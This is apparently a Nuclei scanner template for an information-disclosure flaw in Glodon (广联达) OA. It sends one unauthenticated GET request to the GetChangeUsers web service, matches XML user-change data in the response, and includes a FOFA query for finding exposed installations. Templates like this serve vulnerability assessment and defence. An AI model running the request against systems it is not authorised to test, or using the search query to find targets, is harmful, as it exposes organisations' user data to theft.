id: glodon-GetChangeUsers-disclosure
info:
  name: 广联达 OA GetChangeUsers - disclosure
  author: leadlife
  severity: high
  description: 
  reference: 
    - todo
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"
  tags: glodon,disclosure

http:
  - raw:
      - |
        GET /Org/service/Service.asmx/GetChangeUsers?strDate=2999-01-01 HTTP/1.1
        Host: {{Hostname}}
        Range: bytes=0-100
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
        Connection: close


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"<string",'xmlns=','Users Time')